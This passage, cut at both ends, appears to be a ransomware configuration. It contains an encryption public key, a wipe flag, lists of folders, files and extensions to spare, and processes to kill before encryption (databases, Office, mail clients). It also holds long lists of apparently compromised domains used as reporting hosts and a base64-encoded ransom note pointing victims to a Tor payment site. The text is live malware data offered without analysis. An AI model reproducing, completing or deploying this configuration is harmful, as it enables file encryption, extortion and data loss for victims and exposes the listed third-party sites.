om;mgimalta.com;valiant-voice.com;burg-zelem.de;strauchs-wanderlust.info;pureelements.nl;apmollerpension.com;n-newmedia.de;amyandzac.com;animalfood-online.de;cuadc.org;uci-france.fr;istantidigitali.com;teethinadaydentalimplants.com;nationnewsroom.com;otpusk.zp.ua;galaniuklaw.com;hekecrm.com;sbit.ag;spirello.nl;perceptdecor.com;hnkns.com;zuerich-umzug.ch;renderbox.ch;bcmets.info;hospitalitytrainingsolutions.co.uk;mindsparkescape.com;xn--80abehgab4ak0ddz.xn--p1ai;devplus.be;lollachiro.com;olry-cloisons.fr;line-x.co.uk;alpesiberie.com;reputation-medical.online;grafikstudio-visuell.de;watchsale.biz;k-zubki.ru;rokthetalk.com;jefersonalessandro.com;wyreforest.net;sber-biznes.com;haard-totaal.nl;christopherhannan.com;lidkopingsnytt.nu;aceroprime.com;mbuildinghomes.com;cotton-avenue.co.il;skolaprome.eu;framemyballs.com;catering.com;wirmuessenreden.com;blavait.fr;mayprogulka.ru;andrealuchesi.it;diverfiestas.com.es;die-immo-agentur.de;stoneridgemontessori.com;moira-cristescu.com;humanviruses.org;littlesaints.academy;neolaiamedispa.com;placermonticello.com;cp-bap.de;selected-minds.de;coachpreneuracademy.com;aslog.fr;mahikuchen.com;magnetvisual.com;vipcarrental.ae;mundo-pieces-auto.fr;belinda.af;nepressurecleaning.com;fridakids.com;goodboyscustom.com;protoplay.ca;janmorgenstern.com;yuanshenghotel.com;askstaffing.com;wallflowersandrakes.com;creohn.de;apogeeconseils.fr;fskhjalmar.se;leopoldineroux.com;pinthelook.com;xn--ziinoapte-6ld.ro;zwemofficial.nl;redctei.co;sambaglow.com;topautoinsurers.net;tatyanakopieva.ru;bonitabeachassociation.com;brinkdoepke.eu;so-sage.fr;hutchstyle.co.uk;ncjc.ca;tzn.nu;concontactodirecto.com;aoyama.ac;xtensifi.com;ruggestar.ch;slotspinner.com;breathebettertolivebetter.com;dibli.store;ebible.co;gratiocafeblog.wordpress.com;thiagoperez.com;pilotgreen.com;kausette.com;aberdeenartwalk.org;ownidentity.com;spacebel.be;pazarspor.org.tr;factorywizuk.com;professionetata.com;groovedealers.ru;agora-collectivites.com;rs-danmark.dk;poems-for-the-soul.ch;craftron.com;eatyoveges.com;jakubrybak.com;craftingalegacy.com;aheadloftladders.co.uk;oththukaruva.com;nutriwell.com.sg;energosbit-rp.ru;oraweb.net;mariamalmahdi.com;thegetawaycollective.com;charlottelhanna.com;markseymourphotography.co.uk;leatherjees.com;happylublog.wordpress.com;bulyginnikitav.000webhostapp.com;fidelitytitleoregon.com;osn.ro;studionumerik.fr;cops4causes.org;phukienbepthanhdat.com;beandrivingschool.com.au;chatterchatterchatter.com;bluelakevision.com;mustangmarketinggroup.com;rentingwell.com;biodentify.ai;texanscan.org;landgoedspica.nl;digitale-elite.de;stagefxinc.com;physio-lang.de;jollity.hu;liverpoolabudhabi.ae;logosindustries.com;citydogslife.com;metriplica.academy;a-zpaperwork.eu;andermattswisswatches.ch;jandhpest.com;greenrider.nl;brighthillgroup.com;fotoslubna.com;yvesdoin-aquarelles.fr;mariannelemenestrel.com;airvapourbarrier.com;reizenmetkinderen.be;clinic-beethovenstrasse-ag.ch;rapid5kloan.org;mazift.dk;rolleepollee.com;denhaagfoodie.nl;lesyeuxbleus.net;khtrx.com;richardkershawwines.co.za;rishigangoly.com;apiarista.de;goeppinger-teppichreinigung.de;dreamvoiceclub.org;metcalfe.ca;sycamoregreenapts.com;alharsunindo.com;legundschiess.de;thisprettyhair.com;parentsandkids.com;edrickennedymacfoy.com;elex.is;encounter-p.net;thepixelfairy.com;mediogiro.com.ar;limounie.com;birthplacemag.com;alnectus.com;billigeflybilletter.dk;fi-institutionalfunds.com;distrifresh.com;luvinsburger.fr;kamin-somnium.de;glennverschueren.be;elitkeramika-shop.com.ua;saboboxtel.uk;innersurrection.com;alisodentalcare.com;galatee-couture.com;ciga-france.fr;hostingbangladesh.net;domaine-des-pothiers.com;hostastay.com;ox-home.com;skidpiping.de;shrinkingplanet.com;michal-s.co.il;basindentistry.com;baptistdistinctives.org;premiumweb.com.ua:443;letterscan.de;levencovka.ru;fsbforsale.com;imagine-entertainment.com;medicalsupportco.com;explora.nl;lisa-poncon.fr;louiedager.com;johnstonmingmanning.com;narca.net;kuriero.pro;peninggibadan.co.id;craftstone.co.nz;kiraribeaute-nani.com;eyedoctordallas.com;laylavalentine.com;newonestop.com;guohedd.com;thehovecounsellingpractice.co.uk;epsondriversforwindows.com;mamajenedesigns.com;acumenconsultingcompany.com;animation-pro.co.uk;avis.mantova.it;babysitting-hk.helpergo.co;worldproskitour.com;morgansconsult.com;hypogenforensic.com;alabamaroofingllc.com;arabianmice.com;cap29010.it;bringmehope.org;signamedia.de;riffenmattgarage.ch;opt4cdi.com;aciscomputers.com;pubcon.com;agencewho-aixenprovence.fr;promus.ca;dentallabor-luenen.de;schulz-moelln.de;jimprattmediations.com;mesajjongeren.nl;bajova.sk;spartamovers.com;martha-frets-ceramics.nl;epicjapanart.com;go.labibini.ch;raeoflightmusic.com;pankiss.ru;bruut.online;encounter-p.net;photonag.com;nourella.com;licensed-public-adjuster.com;boomerslivinglively.com;autoteamlast.de;leloupblanc.gr;adterium.com;ronielyn.com;devus.de;9nar.com;bakingismyyoga.com;cymru.futbol;randyabrown.com;biketruck.de;ivancacu.com;geitoniatonaggelon.gr;mikegoodfellow.co.uk;sarahspics.co.uk;belofloripa.be;neonodi.be;ocduiblog.com;santastoy.store;cssp-mediation.org;smartworkplaza.com;katherinealy.com;ludoil.it;jdscenter.com;sharonalbrightdds.com;fire-space.com;saberconcrete.com;letsstopsmoking.co.uk;whoopingcrane.com;ruggestar.ch;iactechnologies.net;5thactors.com;internestdigital.com;glas-kuck.de;jeanmonti.com;ziliak.com;golfclublandgoednieuwkerk.nl;nauticmarine.dk;fluzfluzrewards.com;t3brothers.com;jobstomoveamerica.org;forskolinslimeffect.net;nuohous.com;anleggsregisteret.no;dcc-eu.com;keuken-prijs.nl;opticahubertruiz.com;brownswoodblog.com;fta-media.com;pro-gamer.pl;ced-elec.com;mindfuelers.com;endstarvation.com;tastevirginia.com;stabilisateur.fr;b3b.ch;triplettagaite.fr;factoriareloj.com;global-migrate.com;ronaldhendriks.nl;jonnyhooley.com;soundseeing.net;yournextshoes.com;kickittickets.com;dantreranch.com;scotlandsroute66.co.uk;oportowebdesign.com;motocrosshideout.com;aquacheck.co.za;theater-lueneburg.de;adaduga.info;production-stills.co.uk;rossomattonecase.it;kryddersnapsen.dk;linkbuilding.life;gosouldeep.com;denverwynkoopdentist.com;verbouwingsdouche.nl;lapponiasafaris.com;tutvracks.com;agriturismocastagneto.it;rozmata.com;paprikapod.com;lmmont.sk;makingmillionaires.net;acornishstudio.co.uk;corporacionrr.com;orchardbrickwork.com;from02pro.com;cookinn.nl;the-cupboard.co.uk;interlinkone.com;liepertgrafikweb.at;simpleitsolutions.ch;campusce.com;gurutechnologies.net;tellthebell.website;uncensoredhentaigif.com;nepal-pictures.com;rtc24.com;oro.ae;initconf.com;zinnystar.com;ledyoucan.com;slideevents.be;anchelor.com;pharmeko-group.com;citiscapes-art.com;dayenne-styling.nl;tbalp.co.uk;nxtstg.org;astrographic.com;nieuwsindeklas.be;pisofare.co;advancedeyecare.com;pajagus.fr;mediahub.co.nz;donau-guides.eu;g2mediainc.com;sprintcoach.com;dinedrinkdetroit.com;radishallgood.com;palmenhaus-erfurt.de;jlgraphisme.fr;lassocrm.com;netadultere.fr;mrmac.com;renehartman.nl;graygreenbiomedservices.com;berdonllp.com;globalcompliancenews.com;sololibrerie.it;auberives-sur-vareze.fr;eastgrinsteadwingchun.com;livelai.com;napisat-pismo-gubernatoru.ru:443;fitnessblenderstory.com;expohomes.com;mjk.digital;2020hindsight.info;cyberpromote.de;hensleymarketing.com;innovationgames-brabant.nl;artcase.pl;stathmoulis.gr;mediabolmong.com;kellengatton.com;ncn.nl;3daywebs.com;cleanroomequipment.ie;nalliasmali.net;advesa.com;buzzneakers.com;handyman-silkeborg.dk;billscars.net;catalyseurdetransformation.com;espaciopolitica.com;gatlinburgcottage.com;ninjaki.com;delegationhub.com;nrgvalue.com;focuskontur.com;nykfdyrehospital.dk;skyboundnutrition.co.uk;asiaartgallery.jp;wrinstitute.org;itheroes.dk;jalkapuu.net;amco.net.au;phoenixcrane.com;csaballoons.com;smartercashsystem.com;dentalcircle.com;trainiumacademy.com;operativadigital.com;tages-geldvergleich.de;blueridgeheritage.com;polynine.com;kristianboennelykke.dk;eafx.pro;victorvictoria.com;noda.com.ua;awaisghauri.com;bendel-partner.de;pixelhealth.net;janasfokus.com;goodherbalhealth.com;universelle.fr;eshop.design;endlessrealms.net;brisbaneosteopathic.com.au;secrets-clubs.co.uk;stressreliefadvice.com;sealgrinderpt.com;jag.me;suonenjoen.fi;mrcar.nl;antesacademy.it;mind2muscle.nl;1deals.com;ayudaespiritualtamara.com;alcye.com;advance-refle.com;profibersan.com;tetameble.pl;broccolisoep.nl;direitapernambuco.com;kerstliedjeszingen.nl;cardsandloyalty.com;sshomme.com;p-ride.live;ideamode.com;ygallerysalonsoho.com:443;fazagostar.co;scholarquotes.com;claudiakilian.de;karmeliterviertel.com;patriotcleaning.net;bescomedical.de;mercadodelrio.com", "net": true, "nbody": "LQAtAC0APQA9AD0AIABXAGUAbABjAG8AbQBlAC4AIABBAGcAYQBpAG4ALgAgAD0APQA9AC0ALQAtAA0ACgANAAoAWwArAF0AIABXAGgAYQB0AHMAIABIAGEAcABwAGUAbgA/ACAAWwArAF0ADQAKAA0ACgBZAG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAsACAAYQBuAGQAIABjAHUAcgByAGUAbgB0AGwAeQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAuACAAWQBvAHUAIABjAGEAbgAgAGMAaABlAGMAawAgAGkAdAA6ACAAYQBsAGwAIABmAGkAbABlAHMAIABvAG4AIAB5AG8AdQAgAGMAbwBtAHAAdQB0AGUAcgAgAGgAYQBzACAAZQB4AHAAYQBuAHMAaQBvAG4AIAB7AEUAWABUAH0ALgANAAoAQgB5ACAAdABoAGUAIAB3AGEAeQAsACAAZQB2AGUAcgB5AHQAaABpAG4AZwAgAGkAcwAgAHAAbwBzAHMAaQBiAGwAZQAgAHQAbwAgAHIAZQBjAG8AdgBlAHIAIAAoAHIAZQBzAHQAbwByAGUAKQAsACAAYgB1AHQAIAB5AG8AdQAgAG4AZQBlAGQAIAB0AG8AIABmAG8AbABsAG8AdwAgAG8AdQByACAAaQBuAHMAdAByAHUAYwB0AGkAbwBuAHMALgAgAE8AdABoAGUAcgB3AGkAcwBlACwAIAB5AG8AdQAgAGMAYQBuAHQAIAByAGUAdAB1AHIAbgAgAHkAbwB1AHIAIABkAGEAdABhACAAKABOAEUAVgBFAFIAKQAuAA0ACgANAAoAWwArAF0AIABXAGgAYQB0ACAAZwB1AGEAcgBhAG4AdABlAGUAcwA/ACAAWwArAF0ADQAKAA0ACgBJAHQAcwAgAGoAdQBzAHQAIABhACAAYgB1AHMAaQBuAGUAcwBzAC4AIABXAGUAIABhAGIAcwBvAGwAdQB0AGUAbAB5ACAAZABvACAAbgBvAHQAIABjAGEAcgBlACAAYQBiAG8AdQB0ACAAeQBvAHUAIABhAG4AZAAgAHkAbwB1AHIAIABkAGUAYQBsAHMALAAgAGUAeABjAGUAcAB0ACAAZwBlAHQAdABpAG4AZwAgAGIAZQBuAGUAZgBpAHQAcwAuACAASQBmACAAdwBlACAAZABvACAAbgBvAHQAIABkAG8AIABvAHUAcgAgAHcAbwByAGsAIABhAG4AZAAgAGwAaQBhAGIAaQBsAGkAdABpAGUAcwAgAC0AIABuAG8AYgBvAGQAeQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAHUAcwAuACAASQB0AHMAIABuAG8AdAAgAGkAbgAgAG8AdQByACAAaQBuAHQAZQByAGUAcwB0AHMALgANAAoAVABvACAAYwBoAGUAYwBrACAAdABoAGUAIABhAGIAaQBsAGkAdAB5ACAAbwBmACAAcgBlAHQAdQByAG4AaQBuAGcAIABmAGkAbABlAHMALAAgAFkAbwB1ACAAcwBoAG8AdQBsAGQAIABnAG8AIAB0AG8AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALgAgAFQAaABlAHIAZQAgAHkAbwB1ACAAYwBhAG4AIABkAGUAYwByAHkAcAB0ACAAbwBuAGUAIABmAGkAbABlACAAZgBvAHIAIABmAHIAZQBlAC4AIABUAGgAYQB0ACAAaQBzACAAbwB1AHIAIABnAHUAYQByAGEAbgB0AGUAZQAuAA0ACgBJAGYAIAB5AG8AdQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAG8AdQByACAAcwBlAHIAdgBpAGMAZQAgAC0AIABmAG8AcgAgAHUAcwAsACAAaQB0AHMAIABkAG8AZQBzACAAbgBvAHQAIABtAGEAdAB0AGUAcgAuACAAQgB1AHQAIAB5AG8AdQAgAHcAaQBsAGwAIABsAG8AcwBlACAAeQBvAHUAcgAgAHQAaQBtAGUAIABhAG4AZAAgAGQAYQB0AGEALAAgAGMAYQB1AHMAZQAgAGoAdQBzAHQAIAB3AGUAIABoAGEAdgBlACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkALgAgAEkAbgAgAHAAcgBhAGMAdABpAHMAZQAgAC0AIAB0AGkAbQBlACAAaQBzACAAbQB1AGMAaAAgAG0AbwByAGUAIAB2AGEAbAB1AGEAYgBsAGUAIAB0AGgAYQBuACAAbQBvAG4AZQB5AC4ADQAKAA0ACgBbACsAXQAgAEgAbwB3ACAAdABvACAAZwBlAHQAIABhAGMAYwBlAHMAcwAgAG8AbgAgAHcAZQBiAHMAaQB0AGUAPwAgAFsAKwBdAA0ACgANAAoAWQBvAHUAIABoAGEAdgBlACAAdAB3AG8AIAB3AGEAeQBzADoADQAKAA0ACgAxACkAIABbAFIAZQBjAG8AbQBtAGUAbgBkAGUAZABdACAAVQBzAGkAbgBnACAAYQAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAhAA0ACgAgACAAYQApACAARABvAHcAbgBsAG8AYQBkACAAYQBuAGQAIABpAG4AcwB0AGEAbABsACAAVABPAFIAIABiAHIAbwB3AHMAZQByACAAZgByAG8AbQAgAHQAaABpAHMAIABzAGkAdABlADoAIABoAHQAdABwAHMAOgAvAC8AdABvAHIAcAByAG8AagBlAGMAdAAuAG8AcgBnAC8ADQAKACAAIABiACkAIABPAHAAZQBuACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGEAcABsAGUAYgB6AHUANAA3AHcAZwBhAHoAYQBwAGQAcQBrAHMANgB2AHIAYwB2ADYAegBjAG4AagBwAHAAawBiAHgAYgByADYAdwBrAGUAdABmADUANgBuAGYANgBhAHEAMgBuAG0AeQBvAHkAZAAuAG8AbgBpAG8AbgAvAHsAVQBJAEQAfQANAAoADQAKADIAKQAgAEkAZgAgAFQATwBSACAAYgBsAG8AYwBrAGUAZAAgAGkAbgAgAHkAbwB1AHIAIABjAG8AdQBuAHQAcgB5ACwAIAB0AHIAeQAgAHQAbwAgAHUAcwBlACAAVgBQAE4AIQAgAEIAdQB0ACAAeQBvAHUAIABjAGEAbgAgAHUAcwBlACAAbwB1AHIAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUALgAgAEYAbwByACAAdABoAGkAcwA6AA0ACgAgACAAYQApACAATwBwAGUAbgAgAHkAbwB1AHIAIABhAG4AeQAgAGIAcgBvAHcAcwBlAHIAIAAoAEMAaAByAG8AbQBlACwAIABGAGkAcgBlAGYAbwB4ACwAIABPAHAAZQByAGEALAAgAEkARQAsACAARQBkAGcAZQApAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGQAZQBjAHIAeQBwAHQAbwByAC4AdABvAHAALwB7AFUASQBEAH0ADQAKAA0ACgBXAGEAcgBuAGkAbgBnADoAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUAIABjAGEAbgAgAGIAZQAgAGIAbABvAGMAawBlAGQALAAgAHQAaABhAHQAcwAgAHcAaAB5ACAAZgBpAHIAcwB0ACAAdgBhAHIAaQBhAG4AdAAgAG0AdQBjAGgAIABiAGUAdAB0AGUAcgAgAGEAbgBkACAAbQBvAHIAZQAgAGEAdgBhAGkAbABhAGIAbABlAC4ADQAKAA0ACgBXAGgAZQBuACAAeQBvAHUAIABvAHAAZQBuACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlACwAIABwAHUAdAAgAHQAaABlACAAZgBvAGwAbABvAHcAaQBuAGcAIABkAGEAdABhACAAaQBuACAAdABoAGUAIABpAG4AcAB1AHQAIABmAG8AcgBtADoADQAKAEsAZQB5ADoADQAKAA0ACgB7AEsARQBZAH0ADQAKAA0ACgANAAoARQB4AHQAZQBuAHMAaQBvAG4AIABuAGEAbQBlADoADQAKAA0ACgB7AEUAWABUAH0ADQAKAA0ACgAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ADQAKAA0ACgAhACEAIQAgAEQAQQBOAEcARQBSACAAIQAhACEADQAKAEQATwBOAFQAIAB0AHIAeQAgAHQAbwAgAGMAaABhAG4AZwBlACAAZgBpAGwAZQBzACAAYgB5ACAAeQBvAHUAcgBzAGUAbABmACwAIABEAE8ATgBUACAAdQBzAGUAIABhAG4AeQAgAHQAaABpAHIAZAAgAHAAYQByAHQAeQAgAHMAbwBmAHQAdwBhAHIAZQAgAGYAbwByACAAcgBlAHMAdABvAHIAaQBuAGcAIAB5AG8AdQByACAAZABhAHQAYQAgAG8AcgAgAGEAbgB0AGkAdgBpAHIAdQBzACAAcwBvAGwAdQB0AGkAbwBuAHMAIAAtACAAaQB0AHMAIABtAGEAeQAgAGUAbgB0AGEAaQBsACAAZABhAG0AZwBlACAAbwBmACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIABhAG4AZAAsACAAYQBzACAAcgBlAHMAdQBsAHQALAAgAFQAaABlACAATABvAHMAcwAgAGEAbABsACAAZABhAHQAYQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEADQAKAE8ATgBFACAATQBPAFIARQAgAFQASQBNAEUAOgAgAEkAdABzACAAaQBuACAAeQBvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzACAAdABvACAAZwBlAHQAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYgBhAGMAawAuACAARgByAG8AbQAgAG8AdQByACAAcwBpAGQAZQAsACAAdwBlACAAKAB0AGgAZQAgAGIAZQBzAHQAIABzAHAAZQBjAGkAYQBsAGkAcwB0AHMAKQAgAG0AYQBrAGUAIABlAHYAZQByAHkAdABoAGkAbgBnACAAZgBvAHIAIAByAGUAcwB0AG8AcgBpAG4AZwAsACAAYgB1AHQAIABwAGwAZQBhAHMAZQAgAHMAaABvAHUAbABkACAAbgBvAHQAIABpAG4AdABlAHIAZgBlAHIAZQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEAAAA=", "nname": "{EXT}-readme.txt", "exp": true, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA"}
{"pk": "jD6pLfwUHlEoWBKadlZ4A78CLm8I0UKlzdzW7XautWE=", "pid": "33", "sub": "357", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["application data", "tor browser", "windows.old", "appdata", "$windows.~bt", "intel", "perflogs", "program files", "programdata", "boot", "msocache", "program files (x86)", "system volume information", "$windows.~ws", "windows", "mozilla", "google", "$recycle.bin"], "fls": ["desktop.ini", "ntuser.dat", "bootfont.bin", "ntldr", "autorun.inf", "ntuser.ini", "ntuser.dat.log", "bootsect.bak", "thumbs.db", "iconcache.db", "boot.ini"], "ext": ["idx", "hta", "icns", "cmd", "wpx", "msp", "msu", "cab", "diagpkg", "spl", "scr", "dll", "themepack", "bin", "prf", "msc", "nls", "msi", "ps1", "mod", "exe", "bat", "adv", "386", "ico", "theme", "ani", "sys", "diagcab", "deskthemepack", "msstyles", "lock", "diagcfg", "ocx", "hlp", "com", "ics", "lnk", "drv", "shs", "rom", "cur", "rtp", "cpl", "key", "icl", "ldf", "nomedia", "mpa"]}, "wfld": ["backup"], "prc": ["thunderbird.exe", "synctime.exe", "dbsnmp.exe", "encsvc.exe", "isqlplussvc.exe", "ocautoupds.exe", "mydesktopqos.exe", "powerpnt.exe", "mysqld.exe", "mydesktopservice.exe", "outlook.exe", "mysqld_nt.exe", "firefoxconfig.exe", "sqbcoreservice.exe", "steam.exe", "sqlbrowser.exe", "infopath.exe", "thebat.exe", "msaccess.exe", "mysqld_opt.exe", "tbirdconfig.exe", "visio.exe", "msftesql.exe", "excel.exe", "oracle.exe", "mspub.exe", "sqlservr.exe", "agntsvc.exe", "onenote.exe", "winword.exe", "thebat64.exe", "dbeng50.exe", "wordpad.exe", "ocssd.exe", "sqlwriter.exe", "ocomm.exe", "sqlagent.exe", "xfssvccon.exe"], "dmn": "parksideseniorliving.net;90nguyentuan.com;enactusnhlstenden.com;avisioninthedesert.com;lashandbrowenvy.com;satoblog.org;rsidesigns.com;pansionatblago.ru;magrinya.net;baikalflot.ru;bd2fly.com;business-basic.de;afbudsrejserallinclusive.dk;m2graph.fr;stanleyqualitysystems.com;altitudeboise.com;lexced.com;chainofhopeeurope.eu;bayshoreelite.com;mursall.de;amelielecompte.wordpress.com;wribrazil.com;testitjavertailut.net;chomiksy.net;vitoriaecoturismo.com.br;georgemuncey.com;funworx.de;nbva.co.uk;c-sprop.com;relevantonline.eu;abulanov.com;maxcube24.com.ua;kenmccallum.com;stage-infirmier.fr;skoczynski.eu;mieleshopping.it;holocine.de;oscommunity.de;ikadomus.com;bundan.com;davedavisphotos.com;activeterroristwarningcompany.com;hostaletdelsindians.es;almamidwifery.com;innervisions-id.com;gazelle-du-web.com;angelsmirrorus.com;efficiencyconsulting.es;vedsegaard.dk;schroederschoembs.com;welovecustomers.fr;11.in.ua;modamarfil.com;look.academy;rhino-storage.co.uk;solutionshosting.co.uk;vdolg24.online;azerbaycanas.com;racefietsenblog.nl;photographycreativity.co.uk;crestgood.com;voetbalhoogeveen.nl;suitesartemis.gr;bodymindchallenger.com;test-teleachat.fr;sjtpo.org;patassociation.com;iron-mine.ru;deduktia.fi;ntinasfiloxenia.gr;banukumbak.com;forextimes.ru;rattanwarehouse.co.uk;mslp.org;wineandgo.hu;happycatering.de;dogsunlimitedguide.com;rubyaudiology.com;bridalcave.com;loparnille.se;fotoeditores.com;dentourage.com;loysonbryan.com;perfectgrin.com;eurethicsport.eu;fann.ru;gavelmasters.com;advanced-removals.co.uk;bluemarinefoundation.com;frankgoll.com;hotjapaneselesbian.com;affligemsehondenschool.be;directique.com;cascinarosa33.it;maryairbnb.wordpress.com;ijsselbeton.nl;ahgarage.com;johnkoen.com;frameshift.it;fascaonline.com;ilveshistoria.com;akwaba-safaris.com;teutoradio.de;therapybusinessacademy.com;natturestaurante.com.br;metallbau-hartmann.eu;vvego.com;airserviceunlimited.com;pedmanson.com;profiz.com;sveneulberg.de;triavlete.com;altocontatto.net;allinonecampaign.com;docarefoundation.org;banksrl.co.za;metroton.ru;kafkacare.com;rentsportsequip.com;zealcon.ae;floweringsun.org;benchbiz.com;carmel-york.com;jacquesgarcianoto.com;artvark.nl;marcandy.com;mondolandscapes.com;greeneyetattoo.com;the5thquestion.com;angelika-schwarz.com;gta-jjb.fr;the3-week-diet.net;wordpress.idium.no;rename.kz;rhino-turf.com;pxsrl.it;flossmoordental.com;dieetuniversiteit.nl;keyboardjournal.com;richardiv.com;grupoexin10.com;margaretmcshane.com;pourlabretagne.bzh;outstandingminialbums.com;slotenmakerszwijndrecht.nl;bratek-immobilien.de;paradigmlandscape.com;motocrossplace.co.uk;subyard.com;palmecophilippines.com;ultimatelifesource.com;zdrowieszczecin.pl;auto-opel.ro;skinkeeper.li;reygroup.pt;putzen-reinigen.com;johnsonweekly.com;boyfriendsgoal.site;leadforensics.com;circuit-diagramz.com;terraflair.de;pvandambv.nl;matthieupetel.fr;biblica.com;bilius.dk;fla.se;jax-interim-and-projectmanagement.com;julielusktherapy.com;specialtyhomeservicesllc.com;skyscanner.ro;betterce.com;lifeinbreaths.com;grancanariaregional.com;iexpert99.com;toranjtuition.org;xrresources.com;justaroundthecornerpetsit.com;alltagsrassismus-entknoten.de;oexebusiness.com;site.markkit.com.br;bookingwheel.com;miscbo.it;invela.dk;peppergreenfarmcatering.com.au;insane.agency;thestudio.academy;jlwilsonbooks.com;ykobbqchicken.ca;colored-shelves.com;carsten.sparen-it.de;tieronechic.com;trivselsguide.dk;nicksrock.com;lunoluno.com;smartspeak.com;stringnosis.academy;greatofficespaces.net;descargandoprogramas.com;prometeyagro.com.ua;globalskills.pt;levelseven.be;bubbalucious.com;hiddensee-buhne11.de;primemarineengineering.com;theintellect.edu.pk;goddardleadership.org;lsngroupe.com;akcadagofis.com;chris-anne.com;azloans.com;zorgboerderijravensbosch.nl;cormanmarketing.com;axisoflove.org:443;marmarabasin.com;xn--80addfr4ahr.dp.ua;hameghlim.com;webforsites.com;successcolony.com.ng;arazi.eus;alexwenzel.de;hotelturbo.de;triplettabordeaux.fr;datatri.be;easydental.ae;kdbrh.com;wademurray.com;pinkxgayvideoawards.com;hoteltantra.com;drbrianhweeks.com;duthler.nl;supercarhire.co.uk;frimec-international.es;quitescorting.com;unboxtherapy.site;leansupremegarcinia.net;adedesign.com;richardmaybury.co.uk;agenceassemble.fr;four-ways.com;o90.dk;druktemakersheerenveen.nl;yourcosmicbeing.com;catchup-mag.com;adabible.org;traitware.com;drnelsonpediatrics.com;subquercy.fr;leijstrom.com;aktivfriskcenter.se;avtoboss163.ru:443;chatberlin.de;dinecorp.com;prodentalblue.com;atelierkomon.com;malevannye.ru;bourchier.org;acibademmobil.com.tr;min-virksomhed.dk;purepreprod4.com;hinotruckwreckers.com.au;alattekniksipil.com;redpebblephotography.com;piestar.com;salonlamar.nl;lumturo.academy;stitch-n-bitch.com;molinum.pt;ilovefullcircle.com;brunoimmobilier.com;indiebizadvocates.org;innovationgames-brabant.nl;pays-saint-flour.fr;foerderverein-vatterschule.de;queertube.net;drbenveniste.com;gaearoyals.com;shortysspices.com;beauty-traveller.com;livedeveloper.com;eksperdanismanlik.com;futurenetworking.com;customroasts.com;cmascd.com;muller.nl;michaelfiegel.com;tecleados.com;dennisverschuur.com;dmlcpa.com;saint-malo-developpement.fr;designimage.ae;manzel.tn;myfbateam.com;sochi-okna23.ru;cl0nazepamblog.com;signededenroth.dk;kartuindonesia.com;xn--billigafrgpatroner-stb.se;proffteplo.com;o2o-academy.com;soncini.ch;gsconcretecoatings.com;the-beauty-guides.com;jobscore.com;omnicademy.com;bg.szczecin.pl;111firstdelray.com;naukaip.ru;log-barn.co.uk;tilldeeke.de;optigas.com;husetsanitas.dk;kroophold-sjaelland.dk;matteoruzzaofficial.com;mollymccarthydesign.com;mangimirossana.it;onlinemarketingsurgery.co.uk;onesynergyinternational.com;deziplan.ru;buonabitare.com;spectamarketingdigital.com.br;annenymus.com;luvbec.com;glende-pflanzenparadies.de;tchernia-conseil.fr;witraz.pl;karelinjames.com;finnergo.eu;dr-vita.de;parseport.com;jayfurnitureco.com;transifer.fr;thegrinningmanmusical.com;achetrabalhos.com;thesilkroadny.com;memphishealthandwellness.com;skooppi.fi;circlecitydj.com;bodet150ans.com;midwestschool.org;springfieldplumbermo.com;augen-praxisklinik-rostock.de;taulunkartano.fi;unexplored.gr;silverbird.dk;speakaudible.com;theboardroomafrica.com;lgiwines.com;cesep2019.com;lovcase.com;alaskaremote.com;kvetymichalovce.sk;trevi-vl.ru;casinodepositors.com;koncept-m.ru;angeleyezstripclub.com;liveyourheartout.co;vapiano.fr;towelroot.co;solidhosting.nl;hom-frisor.dk;projektparkiet.pl;masecologicos.com;baita.ac;juergenblaetz.de;veggienessa.com;startuplive.org;inewsstar.com;jaaphoekzema.nl;girlish.ae;fixx-repair.com;bmw-i-pure-impulse.com;pokemonturkiye.com;edvestors.org;bjornvanvulpen.nl;nginx.com;yourhappyevents.fr;ddmgen.com;boloria.de;molade.nl;lagschools.ng;nvisionsigns.com;bluetenreich-brilon.de;buffdaddyblog.com;entdoctor-durban.com;bellesiniacademy.org;mazzaropi.com.br;bychowo.pl;kryptos72.com;awaitspain.com;forumsittard.nl;mensemetgesigte.co.za;weddingceremonieswithtim.com;agendatwentytwenty.com;barbaramcfadyenjewelry.com;smarttourism.academy;jglconsultancy.com;sachainchiuk.com;schlagbohrmaschinetests.com;daveystownhouse.com;krishnabrawijaya.com;imajyuku-sozoku.com;clemenfoto.dk;kombi-dress.com;a